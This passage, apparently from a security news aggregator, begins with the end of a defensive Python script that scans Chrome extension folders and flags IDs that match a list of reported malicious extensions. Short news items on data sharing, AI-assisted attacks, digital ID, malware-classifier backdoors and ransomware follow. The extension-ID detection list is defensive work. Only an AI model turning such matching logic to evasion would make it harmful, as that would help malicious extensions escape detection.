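        "ponmlkjihgfedcbaponmlkjihgfedcba": ("Coupon Helper", "3.0.1"),  # look-alike, clean ID
    }
    for ext_id, (name, version) in samples.items():
        version_dir = root / ext_id / f"{version}_0"  # Chrome names version folders <ver>_0
        version_dir.mkdir(parents=True, exist_ok=True)
        manifest = {"name": name, "version": version, "manifest_version": 3}
        (version_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    return root


if __name__ == "__main__":
    # Use the real profile folder when present, otherwise the constructed fixture.
    target = DEFAULT_ROOT if DEFAULT_ROOT.is_dir() else build_fixture()
    installed = scan_extensions(target)
    for ext in installed:
        print(f"{ext['id']}  {ext['version']:<10} {ext['name']}")
    for ext in flag_reported(installed, KNOWN_BAD_IDS):
        print(f"REPORTED ID INSTALLED: {ext['id']} ({ext['name']}) at {ext['path']}")
```

Point DEFAULT_ROOT at another profile folder (for example "Profile 1" instead of "Default", or the Edge path) to cover additional profiles; a hit on a reported ID is the cue to use the Remove button described above.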


https://malware.news/t/how-to-find-and-remove-credential-stealing-chrome-extensions/104103

Malware News

IRS Improperly Shares Immigrants’ Data with ICE: Explained

Erin Schilling and Erin Slowey report: The IRS’ improper disclosure of thousands of immigrants’ personal information to the Department of Homeland Security fulfilled early warnings that the data-sharing deal between the agencies would put taxpayer data at risk. The IRS and DHS in April 2025 agreed to share data of immigrants to help with criminal...



Article Link:
IRS Improperly Shares Immigrants’ Data with ICE: Explained – DataBreaches.Net

https://malware.news/t/irs-improperly-shares-immigrants-data-with-ice-explained/104098

Malware News

AI-Driven Threats Targeting U.S. Organizations

Artificial intelligence has become a force multiplier across the cybersecurity landscape. U.S. organizations are investing heavily in AI to improve detection, automate response, and analyze large volumes of telemetry in real time. At the same time, threat actors are integrating the same technologies into their operations to increase speed, scale, and precision.

In the United States, where critical infrastructure, financial systems, defense contractors, healthcare providers, and technology firms operate at a massive scale, this dual-use dynamic creates a uniquely high-risk environment. AI lowers technical barriers, allowing attackers to automate reconnaissance, refine targeting, and generate convincing content with minimal effort. The result is not only more attacks, but more adaptive ones.

Recent findings reinforce this shift from theory to practice. In OpenAI’s June 2025 report on disrupting malicious uses of AI, researchers identified and banned accounts linked to multiple influence operations and cyber campaigns that relied on AI-generated social media content, automated translation, malware development support, and large-scale impersonation efforts. In one influence campaign, threat actors generated at least 220 coordinated comments to simulate organic engagement around geopolitical narratives, while other operations used AI to bulk-produce resumes for deceptive employment schemes or assist in debugging malware components.

A fake tweet generated using AI by a threat actor (Source: OpenAI’s June 2025 report)

These cases show that AI is no longer just assisting attackers at the margins. It is being embedded directly into social engineering, influence operations, credential abuse, and even malware development workflows. For U.S. organizations, the risk is not simply increased volume. It is increased precision, automation, and adaptability. Security teams must now defend against adversaries who can generate persuasive content at scale, refine code iteratively, and coordinate cross-platform campaigns with unprecedented efficiency.

The Rise of AI-Enabled Adversaries
Threat actors are no longer relying solely on manual reconnaissance or handcrafted exploits. The Microsoft Digital Defense Report 2025 highlights that adversaries are applying generative AI to scale social engineering, support vulnerability discovery, and adapt malicious code to evade detection controls in real time. AI shortens preparation cycles and allows campaigns to move from planning to execution much faster than before.

Exploitation remains heavily tied to common entry points, but AI increases the efficiency of those tactics. Recent incident response data shows that 28% of breaches began with phishing or social engineering, while 18% stemmed from unpatched web-facing assets and 12% involved exposed remote services. AI-assisted scanning and content generation help adversaries target these weak points at scale, prioritizing high-probability entry paths across large enterprise environments.

The report also observed a significant rise in destructive campaigns targeting cloud environments, underscoring how AI-enabled reconnaissance and automation intersect with hybrid infrastructure risk. This shift is not limited to highly sophisticated groups. Widely accessible AI tools allow smaller criminal operations to generate convincing phishing lures, refine scripts, and accelerate exploitation workflows. As automation becomes embedded in attacker playbooks, U.S. face to...

https://malware.news/t/ai-driven-threats-targeting-u-s-organizations/104096

Malware News

UK’s Digital ID U-Turn: What It Means for Security

The UK government has quietly backed away from one of its most controversial policies: making a national digital ID mandatory for anyone who wants to work in the country. Prime Minister Keir Starmer’s Brit Card plan would have required every working adult to hold a digital identity document on their phone by 2029, as part of a broader crackdown on illegal work and immigration.


After a public outcry, fierce criticism from civil liberties groups, and a petition surpassing three million signatures, ministers have now said digital ID will be optional rather than compulsory. Digital right‑to‑work checks will still become mandatory.

Starmer’s u‑turn doesn’t end the debate, particularly as the government plans to push ahead with a voluntary digital ID program. So why was the plan so contentious in the first place?

Key takeaways

— The UK’s plan to make digital ID mandatory for all workers raised deep civil liberties concerns. This included fears of mass surveillance.
— Digital ID systems often rely on biometrics and centralized databases that, if breached or misused, can expose people to long‑term identity, safety, and privacy risks.
— Even when optional, digital ID programs can “creep” into more areas of life over time. This makes it harder for people to opt out without employers or service providers excluding them.

Why was mandatory digital ID in the UK so controversial?
At first glance, a digital ID to prove you have the right to work sounds like a simple modernization of outdated, manually-intensive paper checks. The government argued that current right‑to‑work verification is a “mishmash” of paper systems with no proper audit trail. This makes it easy to forge documents and harder to catch illegal employment. 

The proposal would see an official digital identity stored in a government app (GOV.UK Wallet) on every citizen’s smartphone. The ID would contain the name, date of birth, nationality, residence status, and photo of the holder.

Critics warned that tying the right to work to a single state‑controlled digital credential would fundamentally change the relationship between citizens and the government. Civil liberties group Big Brother Watch warned that simply participating in everyday life would require constant identity checks under the new system.

For many, this looked less like a targeted tool against illegal work and more like the foundation of a permanent population‑wide ID system.

Civil liberties and surveillance fears
The scale of public opposition was significant. A parliamentary petition opposing digital ID gathered nearly three million signatures, and media reports linked those concerns directly to the government’s decision to abandon the mandatory requirement.

For many people, the greatest concern was that this new scheme would become a tool of mass state surveillance. Though ministers initially insisted the system was about right‑to‑work checks, the list of proposed uses for the Brit Card, such as the ability to claim social security benefits, began to expand rapidly.

With ministers allowing ‘scope creep’ from the outset, many citizens quickly came to understand just how dangerous the system may be in future. Advocates of digital ID were also unable to adequately explain how people without smartphones would be able to participate in society.

Central databases are high‑value targets
The UK’s proposed Digital ID system relies on a centralized database to store data on every citizen. That consolidation may be efficient, but it creates a single...


https://malware.news/t/uk-s-digital-id-u-turn-what-it-means-for-security/104094

Malware News

ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808, (Fri, Feb 13th)


Article Link:
ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808

https://malware.news/t/isc-stormcast-for-friday-february-13th-2026-https-isc-sans-edu-podcastdetail-9808-fri-feb-13th/104091

Malware News

NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers

Session 12B: Malware


Authors, Creators & Presenters: Dung Thuy Nguyen (Vanderbilt University), Ngoc N. Tran (Vanderbilt University), Taylor T. Johnson (Vanderbilt University), Kevin Leach (Vanderbilt University)

PAPER

PBP: Post-Training Backdoor Purification for Malware Classifiers

In recent years, the rise of machine learning (ML) in cybersecurity has brought new challenges, including the increasing threat of backdoor poisoning attacks on ML malware classifiers. These attacks aim to manipulate model behavior when provided with a particular input trigger. For instance, adversaries could inject malicious samples into public malware repositories, contaminating the training data and potentially misclassifying malware by the ML model. Current countermeasures predominantly focus on detecting poisoned samples by leveraging disagreements within the outputs of a diverse set of ensemble models on training data points. However, these methods are not applicable in scenarios involving ML-as-a-Service (MLaaS) or for users who seek to purify a backdoored model post-training. Addressing this scenario, we introduce PBP, a post-training defense for malware classifiers that mitigates various types of backdoor embeddings without assuming any specific backdoor embedding mechanism. Our method exploits the influence of backdoor attacks on the activation distribution of neural networks, independent of the trigger-embedding method. In the presence of a backdoor attack, the activation distribution of each layer is distorted into a mixture of distributions. By regulating the statistics of the batch normalization layers, we can guide a backdoored model to perform similarly to a clean one. Our method demonstrates substantial advantages over several state-of-the-art methods, as evidenced by experiments on two datasets, two types of backdoor methods, and various attack configurations. Our experiments showcase that PBP can mitigate even the SOTA backdoor attacks for malware classifiers, e.g., Jigsaw Puzzle, which was previously demonstrated to be stealthy against existing backdoor defenses. 
Notably, our approach requires only a small portion of the training data -- only 1% -- to purify the backdoor and reduce the attack success rate from 100% to almost 0%, a 100-fold improvement over the baseline methods.

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators’, Authors’ and Presenters’ superb NDSS Symposium 2025 Conference content on the organization’s YouTube Channel.

The post NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers appeared first on Security Boulevard.

Article Link:
NDSS 2025 - PBP: Post-Training Backdoor Purification For Malware Classifiers - Security Boulevard

https://malware.news/t/ndss-2025-pbp-post-training-backdoor-purification-for-malware-classifiers/104089

Malware News

From Operations to Policy: Contributing to the Global Fight Against Ransomware

Today, the government of Canada issued a statement announcing that Arctic Wolf will continue to co-chair the Counter Ransomware Initiative Public-Private Sector Advisory Panel in 2026, alongside Public Safety Canada and BlackBerry. The panel will also include member organizations such as Ensign InfoSecurity, the Institute for Security and Technology, Microsoft, Palo Alto Networks, and the Royal United Service Institute. Why Global Collaboration Is Essential for Modern Ransomware Defense ...


Article Link:
Contributing to the Global Fight Against Ransomware | Arctic Wolf

https://malware.news/t/from-operations-to-policy-contributing-to-the-global-fight-against-ransomware/104087

Malware News

RONDHUIT and US-based BasisTech form a capital and business alliance

The post RONDHUIT and US-based BasisTech form a capital and business alliance appeared first on BasisTech.


Article Link:
RONDHUIT and US-based BasisTech form a capital and business alliance – BasisTech

https://malware.news/t/basistech/104085

Malware News

Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack

On May 20, 2025, CNN reported that a ransomware attack had triggered a “system-wide technology outage” at Kettering Adventist Health in Ohio. Disclosures by Kettering Health would later explain that the healthcare system had been attacked by InterLock, a ransomware gang who were threatening to destroy data and publish data if their demands were not...


Article Link:
Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack – DataBreaches.Net

https://malware.news/t/kettering-adventist-health-now-notifying-patients-affected-by-may-2025-ransomware-attack/104083

Malware News

Arctic Wolf Product Updates: February 2026

The most effective security operations aren’t built by buying more tools. They’re built by making the tools you already have work better together. We hear from our customers that their security teams need to extract maximum value from their technology while operating more efficiently than ever. This quarter, Arctic Wolf doubled down on three areas to support these efforts: smarter integrations, clearer visibility, ...


Article Link:
Arctic Wolf Product Updates: February 2026

https://malware.news/t/arctic-wolf-product-updates-february-2026/104081